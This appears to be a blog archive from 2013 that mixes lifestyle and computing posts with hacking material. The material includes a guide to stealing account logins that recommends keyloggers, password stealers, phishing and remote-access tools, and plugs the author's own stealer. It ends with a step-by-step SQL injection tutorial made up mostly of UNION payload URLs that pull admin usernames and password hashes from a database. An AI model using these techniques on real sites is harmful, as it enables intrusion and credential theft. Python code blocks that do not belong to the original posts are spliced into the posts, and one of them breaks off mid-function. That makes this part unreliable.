Tuesday, 30 July 2013

How to be friends with Introverts?

Ever wondered why that person always stands quiet and alone in one corner while the rest of them party? Why doesn't s/he like to enjoy life like the normal folks?


Nothing is wrong with them. Such people represent that small section (20-25%) of our society who are known as introverts.

There are many myths about such people in our society. For those who think that such people are shy, antisocial, arrogant, rude or dumb, it is not so.

So what are they?

They are just normal people who have their own world within their minds which they find more pleasing than the outer world.
Those who think they don't like talking, try talking to them about something that interests them. You'll be surprised to see how much talkative they can be.
If you think these people are not amiable, look a bit closely into their life. They have a few friends whom they consider to be priceless.
They dislike big groups and prefer to stay alone. This refreshes them and gives them time to think or daydream or whatever you prefer to call it. This time is vital for them since they live in their inner world during these moments.
It is not that they don't like to go out and enjoy. The fact is they don't like staying out for a long time. They'd prefer to go out, complete their task and return as soon as possible. Enjoyment for them is the time they spend in solitude thinking deeply about what interests them.

So how do we befriend them? They don't like speaking at all!!
Take time to get close to them. Don't try to force them to speak. Try to communicate with them non-verbally (sending SMS, chatting online, etc.), or talk with them when you are alone. This kind of communication makes them feel more comfortable since they get more time to think while the conversation goes on. Try to find out what they are interested in. Try talking on that topic instead of the usual small talk. Gradually this person you want to be friends with will get closer to you. You may feel uncomfortable because of their silence in the beginning. But when you finally befriend him/her, you'll have gained an ally for a lifetime (since these people value the people in their small circle of friends much more than extroverts do).

I hope you enjoyed reading the above article.
Thank you.

Sunday, 28 July 2013

Scripting Language vs. Programming Language

Scripting languages are languages that allow you to send commands directly to a system that executes these commands. These commands are read line by line and executed. An error is issued when a line cannot be executed for any reason (wrong syntax, illegal operation, ...). Examples: Python, shell script, Matlab.

Programming languages are languages that allow you to create a program by writing structured code that is read all at once by the system, checked for errors, and translated into an unreadable format that the machine can then execute. e.g. Java, C/C++, Visual Basic...

Programming languages are generally faster in execution than scripting languages but are often more difficult to use and have more rigid syntax. You can generally use either of them to do pretty much anything, though each is more suited for specific applications.

Compiler and Interpreter

A compiler and an interpreter both serve the same purpose: converting high-level language (like C or Java) instructions into the binary form understood by computer hardware. They are the software used to execute high-level programs. Specific compilers/interpreters are designed for different high-level languages. Both have the same objective, but they differ in the way they accomplish it. Through this article we will describe the basic working of each and the basic differences between a compiler and an interpreter.
Compiler
A compiler is a piece of software that translates a high-level language into machine language. When a user writes code in a high-level language such as Java and wants it to execute, a compiler designed for Java is used before it can be executed. The compiler scans the entire program first and then translates it into machine code, which is executed by the computer's processor to perform the corresponding tasks.
Figure: compiler working. The figure outlines the compilation process: the program written in the high-level language is known as the source program and the converted one is called the object program.
Interpreter
Interpreters are not much different from compilers. They also convert the high-level language into machine-readable binary equivalents. Each time an interpreter gets high-level code to execute, it converts the code into an intermediate code before converting it into machine code. Each part of the code is interpreted and then executed separately in sequence, and if an error is found in one part of the code, interpretation stops without translating the next part.
Figure: interpreter working. The figure outlines the basic working of the interpreter: first the source code is converted to an intermediate form, and then that form is executed by the interpreter.
The main differences between compiler and interpreter are listed below:
·         The interpreter takes one statement, translates it, executes it and then takes the next statement, while the compiler translates the entire program in one go and then executes it.
·         The compiler generates the error report after translating the entire program, while an interpreter stops translating as soon as it hits the first error.
·         The compiler takes a larger amount of time analyzing and processing the high-level language code, whereas the interpreter takes less time in the same process.
·         Apart from the processing and analyzing time, the overall execution time of the code is faster for the compiler relative to the interpreter.
Source engineersgarage.com

Thursday, 25 July 2013

Top 10 worst computer viruses in history

Malicious software, worms, Trojans and computer viruses are on the increase, say security experts, as hackers, spammers and identity thieves seek new ways to steal information that can be used to empty bank accounts or spread electronic mayhem. Here, we present a look back at the 10 worst computer viruses ever made.
1. The Morris worm
In 1998 Robert Morris, a university student, unleashed a worm which affected 10 per cent of all the computers connected to the internet (at the time the net was estimated to consist of 60,000 computers), slowing them down to a halt. Morris is now an associate professor at MIT.
2. The Concept virus
The Concept virus, accidentally shipped on a CD-ROM supplied by Microsoft in 1995, was the first virus to infect Microsoft Word documents. Within days it became the most widespread virus the world had ever seen, taking advantage of the fact that computer users shared documents via email.

3. CIH
The Chernobyl virus (also known as CIH) triggers on April 26 each year, the anniversary of the Chernobyl nuclear disaster. It overwrites a chip inside PCs, effectively paralysing the entire computer. Its author, Chen Ing Hau, was caught by the authorities in Taiwan.

4. The Anna Kournikova worm
The Anna Kournikova worm posed as a picture of the tennis player, but was in fact a virus written by Jan de Wit, an obsessed admirer from the Netherlands. He ended up receiving a community service sentence.

5. ILOVEYOU
The Love Bug flooded internet users with ILOVEYOU messages in May 2000, forwarding itself to everybody in the user's address book. It was designed to steal internet access passwords for its Filipino creator.

6. The Melissa virus
The Melissa virus, written by David L Smith in homage to a Florida stripper, was the first successful email-aware virus and inserted a quote from The Simpsons into Word documents. Smith was later sentenced to jail for causing over $80 million worth of damage.

7. The Blaster Worm
The Blaster worm launched a denial of service attack against Microsoft's website in 2003, and infected millions of computers around the world by exploiting a security hole in Microsoft's software. Its author has never been found.

8. Netsky and Sasser
Sven Jaschan, a German teenager, was found guilty of writing the Netsky and Sasser worms. Jaschan was found to be responsible for 70 per cent of all the malware seen spreading over the internet at the time, but escaped prison and was eventually hired by a security company as an "ethical hacker".

9. OSX/RSPlug Trojan
In November 2007, the first example of financially-motivated malware for Apple Macs was discovered in the wild. The launch of the OSX/RSPlug Trojan increased fears that Apple's platform may be targeted more by hackers in the future.

10. Storm worm
The Storm worm, originally posing as breaking news of bad weather hitting Europe, infected computers around the world in 2007. Millions of infected PCs were taken over by hackers and used to spread spam and steal identities.

Source: telegraph.co.uk

How does anti-virus software work

How does anti-virus software work?

An anti-virus software program is a computer program that can be used to scan files to identify and eliminate computer viruses and other malicious software (malware).
Anti-virus software typically uses two different techniques to accomplish this:
  • Examining files to look for known viruses by means of a virus dictionary
  • Identifying suspicious behavior from any computer program which might indicate infection
Most commercial anti-virus software uses both of these approaches, with an emphasis on the virus dictionary approach.
Virus dictionary approach
In the virus dictionary approach, when the anti-virus software examines a file, it refers to a dictionary of known viruses that have been identified by the author of the anti-virus software. If a piece of code in the file matches any virus identified in the dictionary, then the anti-virus software can then either delete the file, quarantine it so that the file is inaccessible to other programs and its virus is unable to spread, or attempt to repair the file by removing the virus itself from the file.
To be successful in the medium and long term, the virus dictionary approach requires periodic online downloads of updated virus dictionary entries. As new viruses are identified "in the wild", civically minded and technically inclined users can send their infected files to the authors of anti-virus software, who then include information about the new viruses in their dictionaries.
Dictionary-based anti-virus software typically examines files when the computer's operating system creates, opens, and closes them; and when the files are e-mailed. In this way, a known virus can be detected immediately upon receipt. The software can also typically be scheduled to examine all files on the user's hard disk on a regular basis.
Although the dictionary approach is considered effective, virus authors have tried to stay a step ahead of such software by writing "polymorphic viruses", which encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match the virus's signature in the dictionary.
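The dictionary approach in working code, as an added example that is not part of the original article: a small scanner that supports two kinds of dictionary entry, whole-file SHA-256 hashes and hex byte patterns with `??` wildcards (the style ClamAV-type signatures use). The sample "files" and signatures are constructed for the demonstration; the second sample differs from the first by one byte, which is exactly the case a hash entry misses and a wildcard pattern still catches.

```python
"""Toy virus-dictionary scanner (added example; not from the article).

Two kinds of dictionary entry are supported:
  * whole-file SHA-256 hashes, which catch one exact byte-for-byte sample, and
  * hex byte patterns with '??' wildcards, which also catch variants that
    change bytes the signature does not pin down.
All samples and signatures below are constructed for the demonstration.
"""
import hashlib
import re
from typing import Dict, List, Tuple

# Constructed sample "files" standing in for a scanned directory.
SAMPLES: Dict[str, bytes] = {
    "invoice.doc": b"plain document text with nothing suspicious",
    "tool.exe": b"MZ\x90\x00" + b"\x00" * 8 + b"EVIL-MARKER-01" + b"\x90" * 4,
    # Same payload with one byte varied in the region the wildcard covers.
    "tool2.exe": b"MZ\x90\x00" + b"\x00" * 8 + b"EVIL-MARKER-02" + b"\x90" * 4,
    "clean.bin": b"\x7fELF" + b"\x00" * 16,
}

# Dictionary entries are (name, kind, value). Hex patterns may contain '??'.
DICTIONARY: List[Tuple[str, str, str]] = [
    # Exact hash of tool.exe: matches that file and nothing else.
    ("Test.Hash.A", "sha256", hashlib.sha256(SAMPLES["tool.exe"]).hexdigest()),
    # "EVIL-MARKER-0" followed by any single byte.
    ("Test.Pattern.A", "hex", "4556494c2d4d41524b45522d30??"),
]


def compile_hex_pattern(pattern: str) -> "re.Pattern[bytes]":
    """Turn a hex signature with '??' wildcards into a compiled byte regex."""
    if len(pattern) % 2 != 0:
        raise ValueError("hex pattern must have an even number of characters")
    parts = []
    for i in range(0, len(pattern), 2):
        pair = pattern[i:i + 2]
        if pair == "??":
            parts.append(b".")  # any single byte
        else:
            parts.append(re.escape(bytes.fromhex(pair)))  # raises on bad hex
    return re.compile(b"".join(parts), re.DOTALL)


def scan_bytes(data: bytes, dictionary=DICTIONARY) -> List[str]:
    """Return the names of every dictionary entry that matches the data."""
    hits = []
    digest = hashlib.sha256(data).hexdigest()
    for name, kind, value in dictionary:
        if kind == "sha256":
            if digest == value.lower():
                hits.append(name)
        elif kind == "hex":
            if compile_hex_pattern(value).search(data):
                hits.append(name)
        else:
            raise ValueError(f"unknown signature kind: {kind}")
    return hits


def scan_samples(samples=SAMPLES, dictionary=DICTIONARY) -> Dict[str, List[str]]:
    """Scan every sample; the result maps each file name to its detections."""
    return {name: scan_bytes(data, dictionary) for name, data in samples.items()}


if __name__ == "__main__":
    for fname, hits in scan_samples().items():
        verdict = ", ".join(hits) if hits else "clean"
        print(f"{fname:12s} {verdict}")
```

A real engine would also scan at file open/close and pull updated entries from the vendor, as the article describes; the matching logic itself is what this block shows.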
Suspicious behavior approach
The suspicious behavior approach, by contrast, doesn't attempt to identify known viruses, but instead monitors the behavior of all programs. If one program tries to write data to an executable program, for example, this is flagged as suspicious behavior and the user is alerted to this, and asked what to do.
Unlike the dictionary approach, the suspicious behavior approach therefore provides protection against brand-new viruses that do not yet exist in any virus dictionary. However, it also sounds a large number of false positives, and users probably become desensitized to all the warnings. If the user clicks "Accept" on every such warning, then the anti-virus software is obviously useless to that user. This problem has especially been made worse over the past 7 years, since many more non-malicious program designs chose to modify other .exes without regard to this false positive issue. Thus, most modern anti-virus software uses this technique less and less.
Other ways to detect viruses
Some anti-virus software will try to emulate the beginning of the code of each new executable that is being executed before transferring control to the executable. If the program seems to be using self-modifying code or otherwise appears to be a virus (it immediately tries to find other executables), one could assume that the executable has been infected with a virus. However, this method results in a lot of false positives.
Yet another detection method is using a sandbox. A sandbox emulates the operating system and runs the executable in this simulation. After the program has terminated, the sandbox is analysed for changes which might indicate a virus. Because of performance issues this type of detection is normally only performed during on-demand scans.
Issues of concern
Macro viruses, arguably the most destructive and widespread computer viruses, could be prevented far more inexpensively and effectively, and without the need of all users to buy anti-virus software, if Microsoft would fix security flaws in Microsoft Outlook and Microsoft Office related to the execution of downloaded code and to the ability of document macros to spread and wreak havoc.
User education is as important as anti-virus software; simply training users in safe computing practices, such as not downloading and executing unknown programs from the Internet, would slow the spread of viruses, without the need of anti-virus software.
Computer users should not always run with administrator access to their own machine. If they would simply run in user mode then some types of viruses would not be able to spread.
The dictionary approach to detecting viruses is often insufficient due to the continual creation of new viruses, yet the suspicious behavior approach is ineffective due to the false positive problem; hence, the current understanding of anti-virus software will never conquer computer viruses.
There are various methods of encrypting and packing malicious software which will make even well-known viruses undetectable to anti-virus software. Detecting these "camouflaged" viruses requires a powerful unpacking engine, which can decrypt the files before examining them. Unfortunately, many popular anti-virus programs do not have this and thus are often unable to detect encrypted viruses.
Companies that sell anti-virus software seem to have a financial incentive for viruses to be written and to spread, and for the public to panic over the threat.
This article is licensed under the GNU Free Documentation License. It uses material from the Wikipedia article "Anti-virus software".

Setting a BIOS Password

Make your computer ask for a password without installing anything.
Your computer's BIOS is the first program that is run when your computer starts. You can tell the BIOS to ask for a password when it starts, thus restricting access to your computer.

To enter the BIOS setup program, sometimes called CMOS setup:

Turn on or reboot your computer. The screen will display a series of diagnostics and a memory check.
A message like "Hit the <DEL> key to enter the BIOS setup program" will appear.
When you do hit DEL at the right time[1] you'll see a menu screen something like this:


Note: Some BIOS versions use a graphical type menu with icons (a GUI) or have a text interface that appears different to the one shown; the principle however is exactly the same.
As you can see there are two options that relate to passwords, Supervisor Password and User Password, these relate to controlling access to the BIOS Setup Program and the Machine Boot respectively.
Note that not all BIOSes have this password feature; your BIOS may not have it, in which case you won't be able to restrict access to your computer in this way.
Select USER PASSWORD and you'll be prompted to enter a password:
You should now enter a password of up to eight characters (most BIOS's are limited to eight characters unfortunately).  I recommend you use the full eight but take care that you choose something you'll not forget, for help choosing passwords see here.
The BIOS will then prompt you to confirm the password, just type the same thing again.
Now you'll want to set your system to ask for that password every time it boots, so select the BIOS FEATURES SETUP option, to see a menu something like this:
Fairly obviously, it's the Password Check option we're interested in, so select it and change the setting to ALWAYS.
Now navigate back to the main menu and select SAVE & EXIT SETUP.  Your machine will then reboot and you'll be prompted for the password.
Each and every time you boot you'll be asked for the password you chose.
Please note that this method of restricting access to your computer is not completely foolproof, there are ways around it. But it will stop or at least delay the majority of casual attempts to get access.

If you forget your BIOS password, consult your motherboard manual or if you don't have one, consult the website of the BIOS manufacturer.
[1] It's not always the DEL key; some BIOSes use F2 or F10 or another key combination. Check your motherboard manual.

Introduction to Hacking Email or any Website Accounts


A Guide by The 7th Sage



Ok, now that you have my attention, please read this guide that will burst your bubble, beginner hackers. I am sorry for that.


You CANNOT hack emails or websites with just one or two clicks with some email hacking apps. You need to have proper information about the person that you are hacking. If you see sites that claim that they can hack email accounts within minutes and charge hundreds of dollars for it, just laugh at them and move on. Do not waste money on them as they will be just scamming you.

There are two ways to hack Accounts of a Website.

Client Side Hacking

This method can be done depending on what you choose. Client side hacking is basically hacking the person's PC and extracting information. Antiviruses will detect the APIs, assemblies, etc. and prevent you from infecting them. In this case you need one of the following:

1) Keylogging : This basically taps all the keystrokes that users type. When the user types a password you get it. The victim has to execute the keylogger "server" file in order to be infected.

2) Password Stealing : Here you steal passwords saved on the user's PC. Browsers often save passwords to provide quick login to the user, but this can be harmful sometimes. Here, as with keyloggers, a file needs to be executed on the client PC. You can use a combination of keylogger and password stealer, such as my Emissary Keylogger/Stealer.

3) Cookie Stealing : Here you are stealing cookies of the user. Cookies can be used to auto login as they hold information about the account.

4) Remote Administration Tools : These tools are very dangerous and give you full control of a computer. You can view webcams, desktops live, transfer and download files.

5) Social Engineering : Social Engineering is nothing but fooling someone to download your malware or extracting sensitive information from them.
One of the methods is this : Hacking Accounts through SE.


6) Phishing Attacks : Phishing is creating fake login pages similar to that of a website's login page and then fooling the person to enter their username and password into the login box. The triggered php scripts shall send the entered passwords to your log file.

7) Zombies/Bots : This is like keylogging and password stealing: if the victim executes your malware, he or she can be infected with a bot. A bot will connect them to your IRC channel or host server and make them your "Zombie". You can do whatever you want with them.

That covers the client part.


Server Side Hacking


1) Exploiting : Exploiting means finding a vulnerability and using it to your advantage. There are various publicly disclosed vulnerabilities and exploits that you can simply search for on Google and HC. There are several ways to exploit a server; the most common ones are

1) XSS Cross Site Scripting,
2) RFI, LFI
3) Uploading Shells
4) SQL Injections
5) CSRF
6) Gaining Root Access to websites hosted on the same server and then intruding another site on the server.
7) Using Scripts to gain information known as Exploits.

These methods are very vast and cannot be explained in a few lines so I am not explaining them in this guide.


2) Bruteforce Attack : Bruteforcing is using a bruteforcer software to try combinations of words, numbers and symbols to fetch the login of your victim. But this rarely works and you need to have a powerful computer.

3) Reverting Accounts : Here we are fooling the website servers that we are the authorized user and the holder of an account. One such vulnerability exists in Hotmail and existed in Facebook. Users just supplied some information about the account such as the last accessed IP address, contacts on the contact list, date of birth, location, etc. With a bit of SE it's not that hard to extract such information from the client.

That covers most of the basics of Email/Website Account "Hacking". Hope you don't buy into any of the bullshit after reading this guide.


Thank You, for reading.

Solixia - Hiding a file inside an Image File

Solixia is a software used to hide any binary/text file inside the pixels of an image file. A highly undetectable steganography technique is used to accomplish this task and your hidden files cannot be viewed by anybody at all. Only Solixia can extract the hidden file from the image. So your files are secure from external tampering if you use Solixia to hide it.

Download Link : Solixia v1.3

Sunday, 21 July 2013

All Web Application Hacking Methods

Parameter manipulation

* Arbitrary File Deletion
* Code Execution
* Cookie Manipulation ( meta http-equiv & crlf injection )
* CRLF Injection ( HTTP response splitting )
* Cross Frame Scripting ( XFS )
* Cross-Site Scripting ( XSS )
* Directory traversal
* Email Injection
* File inclusion
* Full path disclosure
* LDAP Injection
* PHP code injection
* PHP curl_exec() url is controlled by user
* PHP invalid data type error message
* PHP preg_replace used on user input
* PHP unserialize() used on user input
* Remote XSL inclusion
* Script source code disclosure
* Server-Side Includes (SSI) Injection
* SQL injection
* URL redirection
* XPath Injection vulnerability
* EXIF



The list below fits in the category multi-request parameter manipulation

* Blind SQL injection (timing)
* Blind SQL/XPath injection (many types)



The list below fits in the category file checks

* 8.3 DOS filename source code disclosure
* Search for Backup files
* Cross Site Scripting in URI
* PHP super-globals-overwrite
* Script errors ( such as the Microsoft IIS Cookie Variable Information Disclosure )



The list below fits in the category directory checks

* Cross Site Scripting in path
* Cross Site Scripting in Referer
* Directory permissions ( mostly for IIS )
* HTTP Verb Tampering ( HTTP Verb POST & HTTP Verb WVS )
* Possible sensitive files
* Session fixation ( jsessionid & PHPSESSID session fixation )
* Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc )
* WebDAV ( very vulnerable component of IIS servers )



The list below fits in the category text search disclosure

* Application error message
* Check for common files
* Directory Listing
* Email address found
* Local path disclosure
* Possible sensitive files
* Microsoft Office possible sensitive information
* Possible internal IP address disclosure
* Possible server path disclosure ( Unix and Windows )

The Hacker's Manifesto

by
+++The Mentor+++
Written January 8, 1986





Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...

Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world...

Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...

Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."

Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here...

Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...

Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.

Where to begin with hacking

I have seen a lot of people asking for a tutorial on "where to begin with hacking". So here is my opinion about how they should get around starting.
 
 There are three types of hackers:


 White Hats:

The White Hat hacker has dedicated himself to fighting malware and helping others with their computer problems. He is a person you can trust, and he will most likely end up in a well-paying job as a computer programmer or a security consultant. He will most certainly not end up in jail.

 Grey Hats:

The Grey Hat hacker is in between White Hats and Black Hats. He will most likely play pranks on people that he thinks are harmless, but they can also be illegal. He can at one time be helpful and help you with a computer problem, but at the same time infect you with his own virus. There is a chance that the grey hat will end up in prison.
 
 Black Hats:


The Black Hat hacker, also known as a cracker, is the one who defaces websites, steals private information and commits similar illegal activity. It is very time consuming to become a black hat. It can be very hard for them to get a job because of the illegal activity. If law enforcement gets you, you can expect jail time.

 So where to start?

 You should know the answer to these questions before you start your hacking career.


  • Which type of hacker do you want to be (white hat, grey hat or black hat)?
  • Which type of hacking do you want to work with (website hacking, system exploits, pentesting etc.)?
  • What is your end-goal?


 You should meet these requirements to become a successful hacker.


  • You shall be patient.
  • You shall dedicate a lot of time to hacking. You will never stop learning, since hacking is a lifestyle.
  • You should have a computer (I expect you to have one since you are reading this).
  • You shall be interested in how the different computer systems work, and how to control them.


Now that you have an idea of what kind of hacker you want to be, we will look closer into the different topics you can work with as a hacker.

 
 Website Hacking:


You probably already guessed it, but website hacking is about hacking websites. You use your skills to find exploits and vulnerabilities in websites and web applications. Almost all major hacking stories in the news are about websites and databases that have been hacked. Once you have enough experience in website security you will be amazed at how easy it is to find vulnerabilities in websites. However, it will take a lot of effort and time to reach that level of skill. You will need to know a large number of server-side languages and website construction languages like PHP, HTML, JavaScript, SQL, ASP, ASP.NET and Perl. These are just some of the languages you should know about. I recommend you take JavaScript, SQL and PHP very seriously since it is in those languages you will find the most vulnerabilities.



 Pen testing and Forensics:

Pen testing and forensics can earn you big money. These are the guys companies call when they have been hacked. They are experts in operating systems, wireless connections and exploiting computers. This path will take A LOT of time and effort since there is so much you should know about. You shall know how the different operating systems work, which exploits there are for them, how to exploit them, routers, encryption, malware etc.; the list is almost endless.



 Code exploiting:

Not many people know about this. This will require you to be a complete expert at programming. You shall be at least as good at these programming languages as at your main language like English. This kind of hacking takes a lot of time, and will require you to be patient. Do not get me wrong, every company that releases software like Symantec, Google, Microsoft, Adobe, and Oracle has hackers with these skills employed to check their software for vulnerabilities. Sadly, they cannot find every security hole and therefore some very smart black hat hackers are able to find them, and exploit them before the companies get the vulnerability patched. You should know the most popular languages like C++, Java and C etc.



 Computer security:

The work these people do looks a lot like that of the pentesters. These people are able to detect and analyze new viruses and malware. They are working for companies like Symantec, Kaspersky and Avira etc. Some of them are also working in labs that test AVs and new viruses. They are experts in how viruses work and how they infect systems.



 
You should now have an idea of where to start and in which direction you want to go. If you found any errors or typos feel free to contact me, and I will look into it. I will be updating this thread regularly and adding more details. I will soon add a dictionary which explains the most basic hacking terms. I have put a lot of effort into this tutorial and my goal with it is to give computer-interested people an idea of where they should start.

 
To the so-called "noobs" who read this:


 I hope I have inspired you to begin at hacking. I hope that I have cleared things up a little bit, so it does not seem so messy anymore. If you have any questions or something you did not understand, I would gladly explain it to you again. Welcome to the hacker’s world, a new world will open up for you and you will never regret that you chose to become a hacker.

Source: Evilzone

Complete SQL Injection Tutorial

Author: Marezzi

In this tutorial I will describe how SQL injection works and how to use it to get some useful information.


First of all: What is SQL injection?

It's one of the most common vulnerabilities in web applications today. In short, it allows an attacker to execute database queries through the URL and gain access to confidential information.

1. SQL Injection (classic, error-based, or whatever you call it)
2. Blind SQL Injection (the harder part)


So let's start with some action.

1). Check for vulnerability

Let's say that we have a site like this:

http://www.site.com/news.php?id=5

Now, to test whether it is vulnerable, we add a single quote

'

to the end of the URL, which gives

http://www.site.com/news.php?id=5'

so if we get an error like

"You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right etc..."

or something similar, that means it is vulnerable to SQL injection.

2). Find the number of columns

To find the number of columns we use the ORDER BY statement (it tells the database how to order the result). How do we use it? We just increment the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error

http://www.site.com/news.php?id=5 order by 2/* <-- no error

http://www.site.com/news.php?id=5 order by 3/* <-- no error

http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message
like "Unknown column '4' in 'order clause'" or something similar)

That means it has 3 columns, because we got an error on 4.

3). Check for UNION function

With UNION we can select more data in one SQL statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already
found in section 2 that the number of columns is 3)

If we see some numbers on the screen, i.e. 1, 2 or 3, then the UNION works.

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/*

NOTE: if /* is not working or you get some error, then try -- instead.
It's a comment, and it's important for our query to work properly.

Let's say that we have the number 2 on the screen. Now, to check the version,
we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.

it should look like this

http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

If you get an error like "union + illegal mix of collations (IMPLICIT + COERCIBLE) ...":

I didn't see any paper covering this problem, so I must write it down. What we need is the convert() function, i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version
using latin1),3/*

or with hex() and unhex(), i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),
3/*

and you will get the MySQL version.

5). Getting table and column name

Well, if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) we must guess the table and column names in most cases (later I will describe MySQL > 5).
Common table names are: user/s, admin/s, member/s ...
Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
An example would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
(we see the number 2 on the screen like before, and that's good)
so we know that the table admin exists...
Now to check the column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from
admin/* (if you get an error, then try another column name)

We get a username displayed on screen, for example admin, superadmin etc...

Now to check whether the column password exists:

http://www.site.com/news.php?id=5 union all select 1,password,3 from
admin/* (if you get an error, then try another column name)

We see the password on the screen, as a hash or in plain text; it depends on how the database is set up,
i.e. MD5 hash, MySQL hash, SHA1...

Now we must complete the query to make the output look nice.
For that we can use the concat() function (it joins strings),

i.e.

http://www.site.com/news.php?id=5 
union all select 1,concat(username,0x3a,password),3 from admin/*

Note that I put 0x3a, the hex value for : (so 0x3a is the hex value for a colon).

(there is another way to do that: char(58), the ASCII value for :)

http://www.site.com/news.php?id=5 
union all select 1,concat(username,char(58),password),3 from admin/*

Now we get username:password displayed on screen, i.e. admin:admin or admin:somehash.

When you have this, you can log in as admin or some superuser.
If you can't guess the right table name, you can always try mysql.user (default).

It has user and password columns, so an example would be

http://www.site.com/news.php?id=5 
union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like I said before, I'm going to explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in the database.

To get tables we use table_name and information_schema.tables,

i.e.

http://www.site.com/news.php?id=5 
union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list all tables,

i.e.

http://www.site.com/news.php?id=5 
union all select 1,table_name,3 from information_schema.tables limit 0,
1/*

Note that I put 0,1 (get 1 result starting from the 0th).

Now, to view the second table, we change limit 0,1 to limit 1,1,

i.e.

http://www.site.com/news.php?id=5 
union all select 1,table_name,3 from information_schema.tables limit 1,
1/*

The second table is displayed.

For the third table we put limit 2,1,

i.e.

http://www.site.com/news.php?id=5 union all select 1,table_name,3
from information_schema.tables limit 2,1/*

Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.

Here we use column_name and information_schema.columns.

The method is the same as above, so an example would be

http://www.site.com/news.php?id=5 
union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is displayed.

For the second one we change limit 0,1 to limit 1,1,

i.e.

http://www.site.com/news.php?id=5 
union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username, user, login, password, pass, passwd etc...

If you want to display the column names for a specific table, use this query (WHERE clause).

Let's say that we found the table users,

i.e.

http://www.site.com/news.php?id=5 
union all select 1,column_name,3 from 
information_schema.columns where table_name='users'/*

Now we get the column names in table users displayed. Just using LIMIT we can list all columns in table users.

Note that this won't work if magic quotes is ON.

Let's say that we found the columns user, pass and email.

Now, to complete the query and put them all together,
we use concat(), which I described earlier,

i.e.

http://www.site.com/news.php?id=5
union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*

What we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com

That's all for this part; now we can proceed to the harder part.
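The tutorial never shows the server side of news.php?id=. As an added example (not the tutorial's code), the Python/sqlite3 stand-in below builds the query by string concatenation the way the vulnerable page must, beside a version that validates and binds the parameter. The news and admin tables and their contents are constructed sample data, and sqlite3 uses || where MySQL uses concat().

```python
import sqlite3

# Constructed sample data standing in for the tutorial's database (nothing real).
SCHEMA = """
CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
INSERT INTO news VALUES (5, 'Release notes', 'Version 2 shipped.');
INSERT INTO news VALUES (6, 'Outage report', 'Resolved.');
CREATE TABLE admin(username TEXT, password TEXT);
INSERT INTO admin VALUES ('admin', 'somehash');
"""

# The tutorial's UNION payload, adapted to sqlite3 (|| instead of concat(),
# -- as the trailing comment the tutorial suggests when /* does not work).
UNION_PAYLOAD = "5 union all select 1,username||':'||password,3 from admin--"


def make_db():
    """Create the in-memory database the two fetch functions query."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_news_vulnerable(conn, id_param):
    """Mirror of news.php?id=: the raw URL parameter is pasted into the SQL text.

    Whatever follows the number becomes part of the statement, so a UNION
    appended to the parameter runs as part of our SELECT and its rows come
    back mixed with the article rows.
    """
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def fetch_news_safe(conn, id_param):
    """Hardened form: validate the type, then pass the value as a bound parameter.

    The driver sends the value separately from the SQL text, so it can never
    change the shape of the statement; the int() check additionally rejects
    anything that is not a plain article number before it reaches the database.
    """
    try:
        news_id = int(id_param)
    except ValueError:
        return []
    sql = "SELECT id, title, body FROM news WHERE id=?"
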